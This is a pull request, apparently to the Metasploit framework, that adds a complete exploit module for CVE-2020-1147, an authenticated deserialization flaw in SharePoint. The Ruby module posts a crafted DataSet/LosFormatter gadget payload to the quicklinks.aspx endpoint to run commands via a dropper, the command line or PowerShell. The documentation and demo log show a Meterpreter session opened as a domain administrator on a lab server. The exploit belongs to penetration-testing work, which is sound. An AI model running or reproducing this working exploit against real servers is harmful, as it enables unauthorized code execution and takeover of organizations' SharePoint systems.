### PR TITLE
Add the exploit for CVE-2020-1147

### DIFF
--- a/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
@@ -1,12 +1,14 @@
 ## Vulnerable Application
 A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker
-to execute code within the context of the SharePoint application service. The vulnerability is related to a failure to
-validate the source of XML input data, leading to an unsafe deserialization operation. In a default configuration, a
-Domain User account is sufficient to access SharePoint and exploit this vulnerability.
+to execute code within the context of the SharePoint application service. The privileges in this execution context are
+determined by the account that is specified when SharePoint is installed and configured. The vulnerability is related to
+a failure to validate the source of XML input data, leading to an unsafe deserialization operation that can be triggered
+from a page that initializes either the `ContactLinksSuggestionsMicroView` type or a derivative of it. In a default
+configuration, a Domain User account is sufficient to access SharePoint and exploit this vulnerability.
 
 This module leverages the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint that was confirmed to be vulnerable by
 [Soroush Dalili](https://twitter.com/irsdl). Alternative endpoints that instantiate the
-`ContactLinksSuggestionsMicroView` type maybe used as well but are not supported by the module.
+`ContactLinksSuggestionsMicroView` type may be used as well but are not supported by the module.
 
 ### Configuring SharePoint
 Once SharePoint is installed, it needs to be configured with a site in order to be exploitable. The Central
@@ -19,7 +21,7 @@ Administration web interface **is not vulnerable**. To configure SharePoint to b
 1. Install SQL Server Express
 1. Run the "SharePoint Products Configuration Wizard"
     1. Use the SQL Server Express instances as the database server
-1. In te SharePoint "Central Administration" console web interface:
+1. In the SharePoint "Central Administration" console web interface:
     1. Verify that there is a web application under the "Manage web applications" page
     1. Create a new "Site Collection" under the "Create site collections" page
         1. Select the previously created web application
@@ -32,9 +34,10 @@ Administration web interface **is not vulnerable**. To configure SharePoint to b
 1. Install the application and ensure a page is accessible
 1. Start msfconsole
 1. Do: `use exploit/windows/http/sharepoint_data_deserialization`
-1. Set the `RHOST`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
+1. Set the `RHOSTS`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
+1. Set any additional options as required by the previously selected payload
+1. Optionally set the `VHOST`, `SSL` and `DOMAIN` options as appropriate
 1. Run the exploit
-1. You should get a shell
 
 ## Options
 

--- a/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
@@ -1,0 +1,100 @@
+## Vulnerable Application
+A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker
+to execute code within the context of the SharePoint application service. The vulnerability is related to a failure to
+validate the source of XML input data, leading to an unsafe deserialization operation. In a default configuration, a
+Domain User account is sufficient to access SharePoint and exploit this vulnerability.
+
+This module leverages the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint that was confirmed to be vulnerable by
+[Soroush Dalili](https://twitter.com/irsdl). Alternative endpoints that instantiate the
+`ContactLinksSuggestionsMicroView` type maybe used as well but are not supported by the module.
+
+### Configuring SharePoint
+Once SharePoint is installed, it needs to be configured with a site in order to be exploitable. The Central
+Administration web interface **is not vulnerable**. To configure SharePoint to be a stand alone server:
+
+1. Install Active Directory and promote the server to be a Domain Controller
+    1. Install the "Active Directory Domain Services" role
+    1. Promote the server to a Domain Controller in a new forest
+    1. Create a Domain User account for testing
+1. Install SQL Server Express
+1. Run the "SharePoint Products Configuration Wizard"
+    1. Use the SQL Server Express instances as the database server
+1. In te SharePoint "Central Administration" console web interface:
+    1. Verify that there is a web application under the "Manage web applications" page
+    1. Create a new "Site Collection" under the "Create site collections" page
+        1. Select the previously created web application
+        1. Set a Title
+        1. Use the default "Team Site" template
+        1. Set the "Primary Site Collection Administrator" to the Domain Administrator account
+
+## Verification Steps
+
+1. Install the application and ensure a page is accessible
+1. Start msfconsole
+1. Do: `use exploit/windows/http/sharepoint_data_deserialization`
+1. Set the `RHOST`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
+1. Run the exploit
+1. You should get a shell
+
+## Options
+
+## Scenarios
+
+### SharePoint 2016 on Server 2016
+
+```
+msf5 > use exploit/windows/http/sharepoint_data_deserialization 
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168
+RHOSTS => 192.168.63.168
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80
+RPORT => 80
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v
+VHOST => ec2amaz-v2pri0v
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre
+USERNAME => smcintyre
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1
+PASSWORD => Password1
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT
+DOMAIN => SHRPNT
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(windows/http/sharepoint_data_deserialization) > check
+[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.
+msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit
+
+[*] Executing automatic check (disable AutoCheck to override)
+[!] The service is running, but could not be validated. Received the quicklinks HTML form.
+[*] Command Stager progress -   7.42% done (7499/101079 bytes)
+[*] Command Stager progress -  14.84% done (14998/101079 bytes)
+[*] Command Stager progress -  22.26% done (22497/101079 bytes)
+[*] Command Stager progress -  29.68% done (29996/101079 bytes)
+[*] Command Stager progress -  37.09% done (37495/101079 bytes)
+[*] Command Stager progress -  44.51% done (44994/101079 bytes)
+[*] Command Stager progress -  51.93% done (52493/101079 bytes)
+[*] Command Stager progress -  59.35% done (59992/101079 bytes)
+[*] Command Stager progress -  66.77% done (67491/101079 bytes)
+[*] Command Stager progress -  74.19% done (74990/101079 bytes)
+[*] Command Stager progress -  81.61% done (82489/101079 bytes)
+[*] Command Stager progress -  89.03% done (89988/101079 bytes)
+[*] Command Stager progress -  96.45% done (97487/101079 bytes)
+[*] Command Stager progress - 100.00% done (101079/101079 bytes)
+[*] Started bind TCP handler against 192.168.63.168:4444
+[*] Sending stage (176195 bytes) to 192.168.63.168
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400
+
+meterpreter > sysinfo
+Computer        : EC2AMAZ-V2PRI0V
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : SHRPNT
+Logged On Users : 19
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: SHRPNT\Administrator
+meterpreter >
+```

--- a/modules/exploits/windows/http/sharepoint_data_deserialization.rb
+++ b/modules/exploits/windows/http/sharepoint_data_deserialization.rb
@@ -1,0 +1,173 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SharePoint DataSet / DataTable Deserialization',
+        'Description' => %q{
+          A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated
+          attacker to execute code within the context of the SharePoint application service. The vulnerability is
+          related to a failure to validate the source of XML input data, leading to an unsafe deserialization operation.
+          In a default configuration, a Domain User account is sufficient to access SharePoint and exploit this
+          vulnerability.
+        },
+        'Author' => [
+          'Steven Seeley', # detailed vulnerability write up and the DataSet gadget
+          'Soroush Dalili', # usable endpoint testing and confirmation
+          'Spencer McIntyre' # this metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2020-1147'],
+          ['URL', 'https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html']
+        ],
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows EXE Dropper',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :windows_dropper
+          ],
+          [
+            'Windows Command',
+            'Arch' => ARCH_CMD,
+            'Type' => :windows_command,
+            'Space' => 7500
+          ],
+          [
+            'Windows Powershell',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :windows_powershell
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-03-02', # TODO: update me
+        'Notes' =>
+        {
+          'Stability' => [CRASH_SAFE,],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
+      OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
+      OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'quicklinks.aspx'),
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'vars_get' => {
+        'Mode' => 'Suggestion'
+      }
+    })
+
+    return CheckCode::Safe unless res&.code == 200
+    return CheckCode::Safe unless res.headers['MicrosoftSharePointTeamServices']
+
+    html = res.get_html_document
+    return CheckCode::Safe if html.xpath('//html/body/form[@action]').select do |node|
+      node['action'] =~ /quicklinks.aspx\?Mode=Suggestion/i
+    end.empty?
+
+    CheckCode::Detected('Received the quicklinks HTML form.')
+  end
+
+  def exploit
+    case target['Type']
+    when :windows_command
+      execute_command(payload.encoded)
+    when :windows_dropper
+      cmd_target = targets.select { |target| target['Type'] == :windows_command }.first
+      execute_cmdstager({ linemax: cmd_target.opts['Space'] })
+    when :windows_powershell
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    serialized = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
+      cmd,
+      gadget_chain: :TextFormattingRunProperties,
+      formatter: :LosFormatter
+    ))
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'quicklinks.aspx'),
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'vars_get' => {
+        'Mode' => 'Suggestion'
+      },
+      'vars_post' => {
+        '__viewstate' => '',
+        '__SUGGESTIONSCACHE__' => Nokogiri::XML(<<-DATASET, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+          <DataSet>
+            <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
+              <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
+                <xs:complexType>
+                  <xs:choice minOccurs="0" maxOccurs="unbounded">
+                    <xs:element name="Exp_x0020_Table">
+                      <xs:complexType>
+                        <xs:sequence>
+                          <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
+                        </xs:sequence>
+                      </xs:complexType>
+                    </xs:element>
+                  </xs:choice>
+                </xs:complexType>
+              </xs:element>
+            </xs:schema>
+            <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
+              <somedataset>
+                <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">
+                  <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+                  <ExpandedElement/>
+                  <ProjectedProperty0>
+                      <MethodName>Deserialize</MethodName>
+                      <MethodParameters>
+                          <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">#{serialized}</anyType>
+                      </MethodParameters>
+                      <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
+                  </ProjectedProperty0>
+                  </pwn>
+                </Exp_x0020_Table>
+              </somedataset>
+            </diffgr:diffgram>
+          </DataSet>
+        DATASET
+      }
+    })
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to execute the command')
+    end
+
+    res
+  end
+end

--- a/modules/exploits/windows/http/sharepoint_data_deserialization.rb
+++ b/modules/exploits/windows/http/sharepoint_data_deserialization.rb
@@ -17,10 +17,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'SharePoint DataSet / DataTable Deserialization',
         'Description' => %q{
           A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated
-          attacker to execute code within the context of the SharePoint application service. The vulnerability is
-          related to a failure to validate the source of XML input data, leading to an unsafe deserialization operation.
-          In a default configuration, a Domain User account is sufficient to access SharePoint and exploit this
-          vulnerability.
+          attacker to execute code within the context of the SharePoint application service. The privileges in this
+          execution context are determined by the account that is specified when SharePoint is installed and configured.
+          The vulnerability is related to a failure to validate the source of XML input data, leading to an unsafe
+          deserialization operation that can be triggered from a page that initializes either the
+          ContactLinksSuggestionsMicroView type or a derivative of it. In a default configuration, a Domain User account
+          is sufficient to access SharePoint and exploit this vulnerability.
         },
         'Author' => [
           'Steven Seeley', # detailed vulnerability write up and the DataSet gadget
@@ -56,10 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2020-03-02', # TODO: update me
+        'DisclosureDate' => '2020-07-14',
         'Notes' =>
         {
-          'Stability' => [CRASH_SAFE,],
+          'Stability' => [CRASH_SAFE],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
         },
@@ -71,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
       OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
       OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
-      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
+      OptString.new('PASSWORD', [ true, 'The password to authenticate with', '' ])
     ])
   end
 
@@ -86,8 +88,8 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    return CheckCode::Safe unless res&.code == 200
-    return CheckCode::Safe unless res.headers['MicrosoftSharePointTeamServices']
+    return CheckCode::Safe('Failed to authenticate to the server.') if res&.code == 401
+    return CheckCode::Safe('Failed to identify that SharePoint is running.') unless res&.code == 200 && res.headers['MicrosoftSharePointTeamServices']
 
     html = res.get_html_document
     return CheckCode::Safe if html.xpath('//html/body/form[@action]').select do |node|


### PR DESCRIPTION
This PR adds an authenticated RCE exploit targeting SharePoint instances. The vulnerability details and exploit are heavily based off of the analysis posted by Steven Seeley on [srcincite.io](https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html). The vulnerability is a deserialization vulnerability within a specific type handler that can be exploited by a specially crafted HTTP request using the `DataSet` XML gadget to load a `LosFormatter` blob (hooray for more .NET Deserialization usage! :tada:).

This exploit targets the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint that was confirmed to be functioning by Soroush Dalili. While another endpoint was also confirmed to be vulnerable, and an attacker with the necessary privileges could even utilize the `PUT` verb to make a vulnerable page, I opted to hard code this into the module for the following reasons:

* This endpoint was present in the default configuration and exploitable by a "Domain User" account with no additional privilegs
* The static URI allows a more explicit check method to be utilized
* Using an existing endpoint eliminates the need to create and thus cleanup content as part of the exploitation process

## Testing

- [x] Install the application and ensure a page is accessible
- [x] Start msfconsole
- [x] Do: `use exploit/windows/http/sharepoint_data_deserialization`
- [x] Set the `RHOST`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
- [x] Run the exploit
- [x] You should get a shell

## Demonstration

```
msf5 > use exploit/windows/http/sharepoint_data_deserialization 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168
RHOSTS => 192.168.63.168
msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80
RPORT => 80
msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v
VHOST => ec2amaz-v2pri0v
msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre
USERNAME => smcintyre
msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1
PASSWORD => Password1
msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT
DOMAIN => SHRPNT
msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/http/sharepoint_data_deserialization) > check
[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.
msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Received the quicklinks HTML form.
[*] Command Stager progress -   7.42% done (7499/101079 bytes)
[*] Command Stager progress -  14.84% done (14998/101079 bytes)
[*] Command Stager progress -  22.26% done (22497/101079 bytes)
[*] Command Stager progress -  29.68% done (29996/101079 bytes)
[*] Command Stager progress -  37.09% done (37495/101079 bytes)
[*] Command Stager progress -  44.51% done (44994/101079 bytes)
[*] Command Stager progress -  51.93% done (52493/101079 bytes)
[*] Command Stager progress -  59.35% done (59992/101079 bytes)
[*] Command Stager progress -  66.77% done (67491/101079 bytes)
[*] Command Stager progress -  74.19% done (74990/101079 bytes)
[*] Command Stager progress -  81.61% done (82489/101079 bytes)
[*] Command Stager progress -  89.03% done (89988/101079 bytes)
[*] Command Stager progress -  96.45% done (97487/101079 bytes)
[*] Command Stager progress - 100.00% done (101079/101079 bytes)
[*] Started bind TCP handler against 192.168.63.168:4444
[*] Sending stage (176195 bytes) to 192.168.63.168
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400
meterpreter > sysinfo
Computer        : EC2AMAZ-V2PRI0V
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 19
Meterpreter     : x86/windows
meterpreter > getuid
Server username: SHRPNT\Administrator
meterpreter >
```
